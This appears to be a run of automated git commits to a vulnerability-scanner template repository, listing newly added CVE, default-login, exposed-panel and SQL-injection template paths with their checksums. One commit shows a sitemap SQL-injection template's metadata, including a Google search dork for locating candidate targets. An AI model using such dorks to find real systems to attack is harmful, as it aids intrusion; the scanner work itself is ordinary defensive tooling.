3c8a9ef2e1faa8e0858370b6372bd4048ddb3fc0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:12:37 +0000 Subject: [PATCH 490/609] Auto Generated New Template Addition List [Fri Jul 7 11:12:37 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9d63b283da..8bcb34f95b 100644 --- a/.new-additions +++ b/.new-additions @@ -41,6 +41,7 @@ http/exposures/tokens/asana/asana-client-id.yaml http/exposures/tokens/asana/asana-client-secret.yaml http/exposures/tokens/atlassian-token.yaml http/misconfiguration/unauth-temporal-web-ui.yaml +http/vulnerabilities /other/sitemap-sql-injection.yaml misconfiguration/proxy/open-proxy-external.yaml network/misconfig/apache-dubbo-unauth.yaml network/misconfig/apache-rocketmq-broker-unauth.yaml From f9af74fd254079b3f71a041a68c53ddf98de810a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:12:46 +0000 Subject: [PATCH 491/609] Auto Generated Templates Checksum [Fri Jul 7 11:12:46 UTC 2023] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 45d56b2bb8..e0a74ee727 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2361,6 +2361,7 @@ http/default-logins/druid/druid-default-login.yaml:d9527534b74bae30ca7b4638ebbd2 http/default-logins/dvwa/dvwa-default-login.yaml:26855b5f1f24503341e44ed69546e837031b21a3 http/default-logins/empire/empirec2-default-login.yaml:6837c9676b340e848f01f40c209ea38a979835e9 http/default-logins/emqx/emqx-default-login.yaml:b9b9c507dbb00e69632c28d8218dd45230eb1219 +http/default-logins/esafenet-cdg-default-login.yaml:da757e9488437ecafc7bb2eb569f00a2086b22a2 http/default-logins/exacqvision/exacqvision-default-login.yaml:a47571baba44b168f2d41ebbedd34ee996ee8a80 http/default-logins/flir/flir-default-login.yaml:4859f6fbbe3ac20db253a059bf315ed1e14300c6 http/default-logins/frps/frp-default-login.yaml:47f07bda06770838d4f8d9b9705e8375b9dbf49d @@ -2568,7 +2569,7 @@ http/exposed-panels/c2/covenant-c2.yaml:32db211a75d38e2e5f807b6f63e9a7f4a40d13b2 http/exposed-panels/c2/deimos-c2.yaml:266a59269734128be0a942812e98d4a9fc7237dc http/exposed-panels/c2/empire-c2.yaml:68c37a16d8bb6605361cbe6e88824035f48f02be http/exposed-panels/c2/evilginx.yaml:71ad6eb248a72fe3315d3c28f010130b4bd5257d -http/exposed-panels/c2/hookbot-rat.yaml:41f6f5282982945787a5a44166a0b276bf6af7b0 +http/exposed-panels/c2/hookbot-rat.yaml:9aa395e99970e3d4a6970f552ba71c923ba39ed4 http/exposed-panels/c2/mythic-c2.yaml:05a73d58dc669f0fce5b2d15f9f7becfffc1c76c http/exposed-panels/c2/nh-c2.yaml:98303079db934bddaccc41a2896fa0a144b67290 http/exposed-panels/c2/viper-c2.yaml:f8ac1add15145d048821e3939c90435972a0025f @@ -6405,6 +6406,7 @@ http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:1ac1379d6f765a6008821b965709d http/vulnerabilities/zend/zend-v1-xss.yaml:625c68da0d08d6c8a1381704b3861de7b6ffad6f http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:5cdad439b1340a471900588ca779c1985c865298 http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:61b1a8c05002d6ae6d87cc583301691b2cca06ab +http/vulnerabilities /other/sitemap-sql-injection.yaml:11b617b3aeea8af260685df2185c12887fb9e357 misconfiguration/proxy/open-proxy-external.yaml:e8bd0621346886e2ddd41ca310c609052053cb13 network/backdoor/backdoored-zte.yaml:3aa481fd5f1c0e8e9853646a7fbca35d927911fa network/cisco-smi-exposure.yaml:89fcf6f71dff1403e1845205656ae049948574aa @@ -6530,7 +6532,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:2063b0de3d95c5046874c5f85bb0439512b37442 +templates-checksum.txt:1c9c66d1050891b11acae21d99fef9ff2a79f28d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From d0fea63de12151c1eadc6581a387cba323c20c1a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:13:19 +0000 Subject: [PATCH 493/609] Auto Generated Templates Checksum [Fri Jul 7 11:13:19 UTC 2023] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e0a74ee727..e852a7425d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6156,6 +6156,7 @@ http/vulnerabilities/other/umbraco-base-ssrf.yaml:a0269db92a4348d3e3adfc20bcaf0f http/vulnerabilities/other/unauth-hoteldruid-panel.yaml:68801d2150f73f3c05b2681dd9a11f9fceb762c6 http/vulnerabilities/other/unauth-spark-api.yaml:f32f198e95815090b9bf2a9896671194d2c53fb4 http/vulnerabilities/other/unifi-network-log4j-rce.yaml:7841aba84b67b2d6fae9d1ba5d1f07c392946244 +http/vulnerabilities/other/universal-media-xss.yaml:6b0e96c4a85b79e6fd04d703052c370c5c53400c http/vulnerabilities/other/vanguard-post-xss.yaml:a5938303ad8526d3b6c374ecddaf6f4d21c864c8 http/vulnerabilities/other/viewlinc-crlf-injection.yaml:0815d07a62e9cbb5011e07e9f6c21010ab5cafb8 http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml:9a551f20b08199ea01ddf9f8a21a9dff0b1f44d1 @@ -6180,7 +6181,6 @@ http/vulnerabilities/other/zimbra-preauth-ssrf.yaml:8340932344698ceef67879053745 http/vulnerabilities/other/zms-auth-bypass.yaml:57aa517099f16550077c36af1ee9208b80b2d60a http/vulnerabilities/other/zms-sqli.yaml:b14efa23f6eeaf7941ae4c8cc5d514377e653751 http/vulnerabilities/other/zzcms-xss.yaml:7a43b8efecd2030c318f6d1a82185d1651b88fab -http/vulnerabilities/others/universal-media-xss.yaml:6b0e96c4a85b79e6fd04d703052c370c5c53400c http/vulnerabilities/php/php-xdebug-rce.yaml:cf1ce0da8f7c4ea0a2905672df1113e8896c9863 http/vulnerabilities/phpmyadmin-unauth.yaml:7e7904d758845b3bc5e2b41a776b4ec53297e9fa http/vulnerabilities/portainer-init-deploy.yaml:9d67545219dbc3c0acbb29d03c7ae92beed9ab01 @@ -6532,7 +6532,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:1c9c66d1050891b11acae21d99fef9ff2a79f28d +templates-checksum.txt:796791728880030cc597ee7b25223a9b7c67f138 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 74440d2fbea263747aa995f8975513697b15c2c8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:14:01 +0000 Subject: [PATCH 494/609] TemplateMan Update [Fri Jul 7 11:14:01 UTC 2023] :robot: --- http/vulnerabilities /other/sitemap-sql-injection.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities /other/sitemap-sql-injection.yaml b/http/vulnerabilities /other/sitemap-sql-injection.yaml index 8db450a0e2..72d02f42b5 100644 --- a/http/vulnerabilities /other/sitemap-sql-injection.yaml +++ b/http/vulnerabilities /other/sitemap-sql-injection.yaml @@ -7,6 +7,7 @@ info: reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19 metadata: google-query: intext:"sitemap" filetype:txt, filetype:xml inurl:sitemap + max-request: 1 tags: misconfig,sitemap,sqli http: From 4043cc4adc6d9a0c18e4ae21c35877920cfac6f7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:16:26 +0000 Subject: [PATCH 495/609] Auto Generated New Template Addition List [Fri Jul 7 11:16:26 UTC 2023] :robot: --- .new-additions | 40 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) diff --git a/.new-additions b/.new-additions index 8bcb34f95b..8433c67c34 100644 --- a/.new-additions +++ b/.new-additions @@ -13,9 +13,44 @@ file/webshell/php-webshell.yaml http/cnvd/2022/CNVD-2022-86535.yaml http/cves/2012/CVE-2012-5321.yaml http/cves/2018/CVE-2018-6530.yaml +http/cves/2019/CVE-2019-14789.yaml +http/cves/2019/CVE-2019-8390.yaml +http/cves/2020/CVE-2020-19515.yaml +http/cves/2020/CVE-2020-35984.yaml +http/cves/2020/CVE-2020-35985.yaml +http/cves/2020/CVE-2020-35986.yaml +http/cves/2020/CVE-2020-35987.yaml +http/cves/2022/CVE-2022-4295.yaml +http/cves/2022/CVE-2022-43164.yaml +http/cves/2022/CVE-2022-43165.yaml +http/cves/2022/CVE-2022-43166.yaml +http/cves/2022/CVE-2022-43167.yaml +http/cves/2022/CVE-2022-43169.yaml +http/cves/2022/CVE-2022-43170.yaml +http/cves/2022/CVE-2022-43185.yaml +http/cves/2022/CVE-2022-44944.yaml +http/cves/2022/CVE-2022-44946.yaml +http/cves/2022/CVE-2022-44947.yaml +http/cves/2022/CVE-2022-44948.yaml +http/cves/2022/CVE-2022-44949.yaml +http/cves/2022/CVE-2022-44950.yaml +http/cves/2022/CVE-2022-44951.yaml +http/cves/2022/CVE-2022-44952.yaml http/cves/2023/CVE-2023-0297.yaml +http/cves/2023/CVE-2023-0514.yaml +http/cves/2023/CVE-2023-1730.yaml +http/cves/2023/CVE-2023-1835.yaml +http/cves/2023/CVE-2023-1890.yaml +http/cves/2023/CVE-2023-2023.yaml +http/cves/2023/CVE-2023-2252.yaml +http/cves/2023/CVE-2023-2272.yaml http/cves/2023/CVE-2023-28121.yaml http/cves/2023/CVE-2023-2822.yaml +http/cves/2023/CVE-2023-30256.yaml +http/cves/2023/CVE-2023-30777.yaml +http/cves/2023/CVE-2023-36287.yaml +http/cves/2023/CVE-2023-36289.yaml +http/cves/2023/CVE-2023-36346.yaml http/default-logins/esafenet-cdg-default-login.yaml http/default-logins/pyload/pyload-default-login.yaml http/exposed-panels/arangodb-web-Interface.yaml @@ -26,6 +61,7 @@ http/exposed-panels/dell-idrac.yaml http/exposed-panels/efak-login-panel.yaml http/exposed-panels/pritunl-panel.yaml http/exposed-panels/pyload-panel.yaml +http/exposed-panels/qdpm-login-panel.yaml http/exposed-panels/shell-box.yaml http/exposed-panels/untangle-admin-login.yaml http/exposed-panels/uptime-kuma-panel.yaml @@ -42,6 +78,10 @@ http/exposures/tokens/asana/asana-client-secret.yaml http/exposures/tokens/atlassian-token.yaml http/misconfiguration/unauth-temporal-web-ui.yaml http/vulnerabilities /other/sitemap-sql-injection.yaml +http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml +http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml +http/vulnerabilities/wordpress/notificationx-sqli.yaml +http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml misconfiguration/proxy/open-proxy-external.yaml network/misconfig/apache-dubbo-unauth.yaml network/misconfig/apache-rocketmq-broker-unauth.yaml From 1775a071559fcea654efb2e8860ee0f3630559aa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 11:16:33 +0000 Subject: [PATCH 496/609] Auto Generated Templates Checksum [Fri Jul 7 11:16:33 UTC 2023] :robot: --- templates-checksum.txt | 52 +++++++++++++++++++++++++++++++++++++----- 1 file changed, 46 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e852a7425d..3fa3ff894e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1079,6 +1079,7 @@ http/cves/2019/CVE-2019-14322.yaml:0a9bd7af565eebc40f742b33abd5fa5c10f50813 http/cves/2019/CVE-2019-14470.yaml:e503b60f894f62b5ce60b3483a4a618cb36de336 http/cves/2019/CVE-2019-14530.yaml:0daf3e8c25b0094c0b9225f3acdb8618f3ed91c7 http/cves/2019/CVE-2019-14696.yaml:9331ce4c80a481037df44a995fb148f68fbdad85 +http/cves/2019/CVE-2019-14789.yaml:138c062edb1a7d38a5e04269646e310daae88366 http/cves/2019/CVE-2019-14974.yaml:e10b505b004e0d46806d73f345cfb55f5b43489e http/cves/2019/CVE-2019-15043.yaml:176d1a8d6a9a86cd03446c84b59958583ee9de65 http/cves/2019/CVE-2019-15107.yaml:56d1331c80982df80e1cc0324f0b59b8a49d3b31 @@ -1166,6 +1167,7 @@ http/cves/2019/CVE-2019-7481.yaml:f4544595557126e843a6ba0108d7150250bb43fe http/cves/2019/CVE-2019-7543.yaml:03d86a2bfa6d482be5cdd622a6640d89165d3bdb http/cves/2019/CVE-2019-7609.yaml:ff92cdf6e1874fb416055e79c3ae317be08ae2ae http/cves/2019/CVE-2019-8086.yaml:9f819a3520502f0293b7fd33ec59a198574b65c5 +http/cves/2019/CVE-2019-8390.yaml:df758b973c09a732b12962df89c9b3d2c7182ec6 http/cves/2019/CVE-2019-8442.yaml:eb4f5d3b24860e8fde5108201f2408ec95e69038 http/cves/2019/CVE-2019-8446.yaml:a9fc78750e0ab7ff75eef71e2c602796163fc55c http/cves/2019/CVE-2019-8449.yaml:398dea3d2f474ce51c1ae3f5b292565635d007a6 @@ -1266,6 +1268,7 @@ http/cves/2020/CVE-2020-19283.yaml:91f8003c70f19ac40a5acac6bbc90f12da3957ad http/cves/2020/CVE-2020-19295.yaml:9f151563a1ef88830dc986ea3b6ddbf3b71745d0 http/cves/2020/CVE-2020-19360.yaml:d932ffbeec184402dd78c0dbf8bea7b1383e1b5d http/cves/2020/CVE-2020-1943.yaml:3b7bbd34383606c5508656a3468851cdadc7131e +http/cves/2020/CVE-2020-19515.yaml:06c45109f4474f595b237a1f97c6603214ba76bf http/cves/2020/CVE-2020-1956.yaml:2375aa3be74c5b636fd0eb664274d0276582e695 http/cves/2020/CVE-2020-19625.yaml:3e3bbf77b8fa2ac8d655431e5449fee42100a0db http/cves/2020/CVE-2020-20285.yaml:151a9399bca0eeb752e212c9968c55fcaad7e8b0 @@ -1359,6 +1362,10 @@ http/cves/2020/CVE-2020-35846.yaml:c11ad707d109784458dc81e0ea52715d146f1872 http/cves/2020/CVE-2020-35847.yaml:73a9bac50937850f6b20733631a23794be97ad16 http/cves/2020/CVE-2020-35848.yaml:8d913ecc9f2a82c81c7ac3c15a2aaaf95068390b http/cves/2020/CVE-2020-35951.yaml:c2c755582bda49a37ccaf342009729bf933b952b +http/cves/2020/CVE-2020-35984.yaml:08e9c5769b7e18bfa8074bb1e7f57fde7ea20675 +http/cves/2020/CVE-2020-35985.yaml:4911b2b952c773dd19c15cfb95cf4d1776a05fa1 +http/cves/2020/CVE-2020-35986.yaml:ca00798502f9fda343568d3d8cc9ca014e29b825 +http/cves/2020/CVE-2020-35987.yaml:4c148f648ae37b52bdbda470e73081d526adfd95 http/cves/2020/CVE-2020-36112.yaml:2393d1a0fb2bddea1caa59cfcb0c9eb9996038cc http/cves/2020/CVE-2020-36289.yaml:3afed85c52fd88b42aa75768755e5805e76e5f14 http/cves/2020/CVE-2020-36365.yaml:1a981b021d0172219e2c629cd07db4c9ff0825ab @@ -2192,6 +2199,7 @@ http/cves/2022/CVE-2022-42746.yaml:c64c826d3fe4b719ebb1ca6b5e36a7e787c0f30e http/cves/2022/CVE-2022-42747.yaml:d6941a00d6b78b91798384960bc8ed30a8672d49 http/cves/2022/CVE-2022-42748.yaml:71fadb44b22cc1f9f3c13c93c74c39da31c269bf http/cves/2022/CVE-2022-42749.yaml:a26e8203fe0416ca1bbc8ae8522c05005857361f +http/cves/2022/CVE-2022-4295.yaml:870aca4b538be9c1d9bf72f3f2fc22066f245323 http/cves/2022/CVE-2022-4301.yaml:ccf5f2281f3b8904a23446cf026da065ced35d02 http/cves/2022/CVE-2022-43014.yaml:96115507ed4cfc2a740caeed1fc686584af75779 http/cves/2022/CVE-2022-43015.yaml:7208520cb12217d1afa034dfc32fccd25b6a419a @@ -2200,6 +2208,13 @@ http/cves/2022/CVE-2022-43017.yaml:d06c1e080bfe531480b9ce4564878170064471f4 http/cves/2022/CVE-2022-43018.yaml:b67c145f807e1b5d9eac3444ee19e21eeb71dbfb http/cves/2022/CVE-2022-4306.yaml:baf4b74e105b23b4285e71fe8168ccd0cecf2694 http/cves/2022/CVE-2022-43140.yaml:94e12dcac0d48b4382cc5b502320602d206dd5e4 +http/cves/2022/CVE-2022-43164.yaml:924f72bfb74157cafefbd688296ce0114645266f +http/cves/2022/CVE-2022-43165.yaml:aa3b84293fd7e577c1b014c2fe96392dd9c75767 +http/cves/2022/CVE-2022-43166.yaml:6abece1038fcc857738cd84b5875f10020929e03 +http/cves/2022/CVE-2022-43167.yaml:ea49466ed9ef56108695993ab843ec3fcde241af +http/cves/2022/CVE-2022-43169.yaml:a527693d7b0464f027d419d3932eddc75f4fd51c +http/cves/2022/CVE-2022-43170.yaml:a92d3ff7703adec676a10e8ff4091c796d38c8ea +http/cves/2022/CVE-2022-43185.yaml:d344148808d394de683575db62af2287820dc626 http/cves/2022/CVE-2022-4320.yaml:a4d07e422ca4170711917f56e18dc60c69d09477 http/cves/2022/CVE-2022-4321.yaml:2c946ca96446b21fdda3fe54f8b5c330ba64c7c0 http/cves/2022/CVE-2022-4325.yaml:72f95840a7969d3ae60861ac768bb8fcc0e9d7de @@ -2207,6 +2222,14 @@ http/cves/2022/CVE-2022-4328.yaml:5a9beeb454fc94c94af5e56ede3e4d7d9780cc2a http/cves/2022/CVE-2022-43769.yaml:dfdafa502f74b2ca3cbead39ba7248d2c9479790 http/cves/2022/CVE-2022-4447.yaml:17db327fc7f29f49d27f35710bbb6b7a68c9ff40 http/cves/2022/CVE-2022-44877.yaml:ae1da09d53934b71c213145f2c1a5a7e27be3fac +http/cves/2022/CVE-2022-44944.yaml:60369fc2463f9300475130a127b71f40004cebcb +http/cves/2022/CVE-2022-44946.yaml:fc092eea71654e991dd53c7982e9f284db91d8c9 +http/cves/2022/CVE-2022-44947.yaml:e378a2ba590e4b7912d2246d4106663690a100d8 +http/cves/2022/CVE-2022-44948.yaml:63cdeb1e492d8efe9fdc362515155e8bdaa68359 +http/cves/2022/CVE-2022-44949.yaml:a18df5d378ac98665b09cc4d46bf40353cadbe95 +http/cves/2022/CVE-2022-44950.yaml:f933d12ba66eccd0f8c209bdb3bb01c1096d7ed9 +http/cves/2022/CVE-2022-44951.yaml:38824580218a410b906dce1d32fc1969960d1d14 +http/cves/2022/CVE-2022-44952.yaml:336012f1ce55b38fc84ab710c76918cb80dca9ff http/cves/2022/CVE-2022-45037.yaml:ef2547d289594320da9f217355c847dc7377e97d http/cves/2022/CVE-2022-45038.yaml:74cc40de29a0343ba8f407c813d07ffdf9bd2e48 http/cves/2022/CVE-2022-45362.yaml:d4f9557749334a5b44b082600dcf0c281531adf1 @@ -2232,6 +2255,7 @@ http/cves/2023/CVE-2023-0126.yaml:de24c5c5d48e69fd17d627b321f6a6cd13bdfd07 http/cves/2023/CVE-2023-0236.yaml:24d5ae19e7c945dfaaf7b240fd276cf3aa190e2a http/cves/2023/CVE-2023-0261.yaml:6c17d82c95c5a12dd3b076059e6d90f248e2c970 http/cves/2023/CVE-2023-0297.yaml:78308363f0703f78bcdb8c767b9f9cfd9d758584 +http/cves/2023/CVE-2023-0514.yaml:525fa3846d3aa4c3b456d801a499bce5f84135fa http/cves/2023/CVE-2023-0527.yaml:eef3f7eda2205d193e376033b62a4ef82239d63d http/cves/2023/CVE-2023-0552.yaml:19ffa4072e3f509e9176b63212c9f9ec02149fb6 http/cves/2023/CVE-2023-0562.yaml:b79f3b73e6955a81518118dab31e9a928f01e71e @@ -2249,13 +2273,19 @@ http/cves/2023/CVE-2023-1434.yaml:a68d4a8bb2e0e74d8593a52664402abea29b7e68 http/cves/2023/CVE-2023-1454.yaml:a882db102c7370e2a8358c3b9f37ef4f25311c68 http/cves/2023/CVE-2023-1496.yaml:f98a9ac2b8a977790ffb743b5c4d6f1c701f56f4 http/cves/2023/CVE-2023-1671.yaml:5cd17b9a51849bff7772e8791691be9008a559cc +http/cves/2023/CVE-2023-1730.yaml:0ebeeb3ae5fe6170ea716436fc351b6453d3293e +http/cves/2023/CVE-2023-1835.yaml:224cce94f78b68e3c080f88f7020bd2441874597 +http/cves/2023/CVE-2023-1890.yaml:ab2222321eb10c41c31a80fe1a1eb4854f72e384 +http/cves/2023/CVE-2023-2023.yaml:7262b4f6efa4e6e58673cba90242409f689587f5 http/cves/2023/CVE-2023-20864.yaml:a942bfcf278ae2437eea0c21b1b7012f253528dd http/cves/2023/CVE-2023-20887.yaml:1f936b73c167d4086d2844cd9b2a3699d448c90d http/cves/2023/CVE-2023-20888.yaml:6578364828af002e3416426bca7388f584a284c2 http/cves/2023/CVE-2023-20889.yaml:58e3dd3dcfb1092d41e005c62bd0d9fbe079a8e9 http/cves/2023/CVE-2023-2122.yaml:a6bc912579730f3819aae6040d88cec2f71e633a http/cves/2023/CVE-2023-2130.yaml:a77e6c26481a92a8ed71cf2f759a0fe6b28a40a0 +http/cves/2023/CVE-2023-2252.yaml:2b48faa1acbb166f9cb922420575154e3d2911e2 http/cves/2023/CVE-2023-22620.yaml:bd8d5424d891e246380a9b777a2da2f5b67aa738 +http/cves/2023/CVE-2023-2272.yaml:def47c919c7c05fd04bb26d1ee1575d16f8ec54e http/cves/2023/CVE-2023-22897.yaml:37a02b7c20a16303fb0445aba6c228acf73a01a8 http/cves/2023/CVE-2023-23333.yaml:7b007bc22aa1232f2e84896b5a5b024e60a97f94 http/cves/2023/CVE-2023-23488.yaml:96254b970bc2a47a09fe8a2302ac3f35b55a2c3c @@ -2280,8 +2310,8 @@ http/cves/2023/CVE-2023-25717.yaml:27101b8c6555c4948d131c0e2fc9fa143ce333aa http/cves/2023/CVE-2023-26255.yaml:14cffe12efeed2a59334925f01842b0d932d687e http/cves/2023/CVE-2023-26256.yaml:478715e78058fba752098050e37a2229b30307d8 http/cves/2023/CVE-2023-26360.yaml:7e2c0191dc59002522d20b2ede8984ae5334df66 -http/cves/2023/CVE-2023-26842.yaml:9c8e112f45ac3f9331026b5384debcd0522284f6 -http/cves/2023/CVE-2023-26843.yaml:d7b2f3a00b7b2de3b97143156da0794a614bda2e +http/cves/2023/CVE-2023-26842.yaml:47f005eb64fbb2950876278ae8bd17578bfe0ec9 +http/cves/2023/CVE-2023-26843.yaml:d1fc98c719d0e002e9beb582f11c796c10b23fac http/cves/2023/CVE-2023-27008.yaml:b8cba8b0b92d5d1907a96fa2da856d3064da4d1b http/cves/2023/CVE-2023-27159.yaml:9da57e890593fd488fbcd9c772efac7e261aa910 http/cves/2023/CVE-2023-27179.yaml:e75be23d27b88aa95e07d67a32194c712f9e3165 @@ -2309,8 +2339,10 @@ http/cves/2023/CVE-2023-29923.yaml:4d983f47537226992d155687473e08c38a096276 http/cves/2023/CVE-2023-30019.yaml:2753abdaaa42026658982624b0495bf0ad21326c http/cves/2023/CVE-2023-30210.yaml:d06ef598dd9820bf574d50bd1dd2ee7540295a30 http/cves/2023/CVE-2023-30212.yaml:c677f733ec0e1f1309bf268b63c342ccc264ec9a +http/cves/2023/CVE-2023-30256.yaml:a1959f62e8a8799d3d5ac99f480f0c8237e5e773 +http/cves/2023/CVE-2023-30777.yaml:6e85eecc500e0ba33323aa0005159c4fbdce4636 http/cves/2023/CVE-2023-31059.yaml:9a19a54bbae40949eb308d3d7781a4c2b87aa8c6 -http/cves/2023/CVE-2023-31548.yaml:ccf165e8b3e33fa496db8fac3292a89c9277dd8d +http/cves/2023/CVE-2023-31548.yaml:41c807ff8ce21615be1f3f531a0934058fe10154 http/cves/2023/CVE-2023-32235.yaml:2909b3e8f2c2ca01442dee5be54755312d8f5453 http/cves/2023/CVE-2023-32243.yaml:24a096e3028c614b8c2632b25c68fc7a9960646f http/cves/2023/CVE-2023-32315.yaml:8539e16bd04d7c55c6851e364eefc5989f3831b6 @@ -2325,6 +2357,9 @@ http/cves/2023/CVE-2023-34843.yaml:e005d2e2bce6a97efeaf6a81c4b8d6b236cbfefe http/cves/2023/CVE-2023-34960.yaml:fb3f791de2235951e9ad55d33fbc59e1dd89a546 http/cves/2023/CVE-2023-35843.yaml:c6427155bef898736ce1c5524f31e6a093c8b861 http/cves/2023/CVE-2023-35844.yaml:6d63343cd1d397fc2169be8459ea294c22008817 +http/cves/2023/CVE-2023-36287.yaml:3806c8d2c1f00dd4878e861df1bbb6f3c8945352 +http/cves/2023/CVE-2023-36289.yaml:b1239a597121ad27032974f57f5dd0f75b00ce38 +http/cves/2023/CVE-2023-36346.yaml:5f30818983410c6dc1a82f164db60e01f2fc514d http/default-logins/3com/3com-nj2000-default-login.yaml:799be4fe774ddf8ef9527fadc54682e2be407ebc http/default-logins/UCMDB/ucmdb-default-login.yaml:2e81c5ff7aac63bbc110cd99aa3074f5c1241487 http/default-logins/abb/cs141-default-login.yaml:7899a42f2c66bc81ad6e7eca19caf6ffaf813451 @@ -3084,6 +3119,7 @@ http/exposed-panels/puppetboard-panel.yaml:17ab5a2d4d72030cf9cf10dd9b20c4b4978ca http/exposed-panels/pure-storage-login.yaml:35dccafc9cfc461c0980989a63d6e2ccb2aad648 http/exposed-panels/pyload-panel.yaml:bfdd46fcfa3ca0ce418fc7cfa5f9c1c046f55eb1 http/exposed-panels/pypicloud-panel.yaml:8c3757096a820328509f7e9cd3bd4a88b82acbdc +http/exposed-panels/qdpm-login-panel.yaml:5d1ad36badf5f1702b83664b60a4be87d97b14dd http/exposed-panels/qlik-sense-server.yaml:817373b38871565048c510fb34f5cbc6bbef0d95 http/exposed-panels/qmail-admin-login.yaml:159096692ce7807a6d8d0fe08c461dc6fbe2e391 http/exposed-panels/qnap/qnap-photostation-panel.yaml:5fcf5c8adb379b9d134f401693f226436827baab @@ -6173,7 +6209,7 @@ http/vulnerabilities/other/xerox-efi-lfi.yaml:08df63570f3024bee4e3b01e7ef74dd222 http/vulnerabilities/other/yapi-rce.yaml:57691e569537f29c47bbdef6c3780e9136f85c65 http/vulnerabilities/other/yarn-resourcemanager-rce.yaml:ae2d9ffef01305deff5ff99f220885476adcfa52 http/vulnerabilities/other/yeswiki-sql.yaml:d62cbfd76116aec05d5ff14bd54f50a74ab0c79b -http/vulnerabilities/other/yeswiki-stored-xss.yaml:05bee293078194cbfc82ae49439b20a62224e6a8 +http/vulnerabilities/other/yeswiki-stored-xss.yaml:b4174f2d4ae0dd963be6660ed576aadd97b03821 http/vulnerabilities/other/yeswiki-xss.yaml:53adb0efa9242eeedd84ebb8fe91c2bb8ee052a2 http/vulnerabilities/other/yishaadmin-lfi.yaml:33e4e5405685552e3445d931b6dd990d966b09b2 http/vulnerabilities/other/zcms-v3-sqli.yaml:733ca8a7d5f6bb34ddcbe831644a019f1b34f410 @@ -6273,6 +6309,7 @@ http/vulnerabilities/wordpress/cherry-lfi.yaml:90fc89067aafd825046fd015ae87ebb14 http/vulnerabilities/wordpress/church-admin-lfi.yaml:2165e7fcf166e79cc204321d693c625dd69e2b32 http/vulnerabilities/wordpress/churchope-lfi.yaml:5e180f7c3f4001a407a44bc6866e7177bb258df2 http/vulnerabilities/wordpress/clearfy-cache-xss.yaml:f263b420987727d7c5c5221262fc0ffbfb47ceb7 +http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml:f8683ad9bc7478dacf1da439ad369301653a121b http/vulnerabilities/wordpress/curcy-xss.yaml:90012ef32809c74fb2da3ba0261774eb2933bdd2 http/vulnerabilities/wordpress/diarise-theme-lfi.yaml:9d2890355a5ae74009c6d0f1c27f366615bd1cd8 http/vulnerabilities/wordpress/dzs-zoomsounds-listing.yaml:cecd25463d1d9b724118597a1c3e374b80790126 @@ -6285,6 +6322,7 @@ http/vulnerabilities/wordpress/health-check-lfi.yaml:d8e897d164a46f0f7a91cffc5c2 http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml:99637533386f9fbe04fbe17ced9d71a096ef8ee5 http/vulnerabilities/wordpress/issuu-panel-lfi.yaml:e083d93a56b3860f0e493a1124e126d4468c29bd http/vulnerabilities/wordpress/ldap-wp-login-xss.yaml:a672f298bdeb7229948e516f0896af0b81dc398c +http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml:9f8c0d213495264cc538ff204621f6531708dff9 http/vulnerabilities/wordpress/members-list-xss.yaml:0d3cd6dfd62f57f2b87580fd734f0cd0ea038542 http/vulnerabilities/wordpress/modula-image-gallery-xss.yaml:33998037eea7ef54fc357358d9b658eb7095d198 http/vulnerabilities/wordpress/mthemeunus-lfi.yaml:4762667c3e9d02444074b101702919519ab1945a @@ -6293,6 +6331,7 @@ http/vulnerabilities/wordpress/my-chatbot-xss.yaml:f351f78983314c33125570c6cf09b 